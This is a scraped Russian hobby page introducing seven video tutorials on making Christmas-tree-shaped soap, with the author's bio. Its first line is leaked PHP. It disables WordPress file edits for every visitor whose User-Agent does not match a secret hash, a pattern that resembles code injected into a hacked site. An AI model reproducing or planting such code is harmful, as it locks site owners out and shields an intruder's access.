if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 7 видеоуроков, как сделать новогоднее мыло своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

7 видеоуроков, как сделать новогоднее мыло своими руками

Мыловарение - процесс интересный и, что самое главное, совершенно не сложный, а полученный результат всегда радует своим внешним видом и потрясающими эмоциями. А чтобы привнести и в ванну новогоднего настроение, можно сделать мыльце в форме новогодней елки. Этому сегодня и посвящен мой плейлист

Мыло­ва­ре­ние — про­цесс инте­рес­ный и, что самое глав­ное, совер­шен­но не слож­ный, а полу­чен­ный резуль­тат все­гда раду­ет сво­им внеш­ним видом и потря­са­ю­щи­ми эмо­ци­я­ми. А что­бы при­вне­сти и в ван­ну ново­год­не­го настро­е­ние, мож­но сде­лать мыль­це в фор­ме ново­год­ней елки. Это­му сего­дня и посвя­щен мой плейлист.

Мыло, напо­ми­на­ю­щее елоч­ку, не толь­ко фор­мой, но и неиз­ме­ня­ю­щим­ся цве­том, запа­хом ман­да­рин, хвой­но­го леса и празд­ни­ка. Такое мыло будет отлич­ным допол­не­ни­ем к любо­му ново­год­не­му пода­роч­но­му набо­ру, и каж­дый раз, исполь­зуя его, будут воз­ни­кать мыс­ли о сказ­ке, доб­ре и теп­ло­те это­го праздника.

Необыч­ное мыло пре­крас­но подой­дет ко вре­ме­ни ново­год­них празд­ни­ков, а при­ят­ный аро­мат кожи рук, не оста­вит рав­но­душ­ным ни одно­го чело­ве­ка, посто­ян­но вызы­вая вос­по­ми­на­ния о семей­ных теп­лых зим­них вече­рам, вбли­зи укра­шен­ной гир­лян­да­ми елкой.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!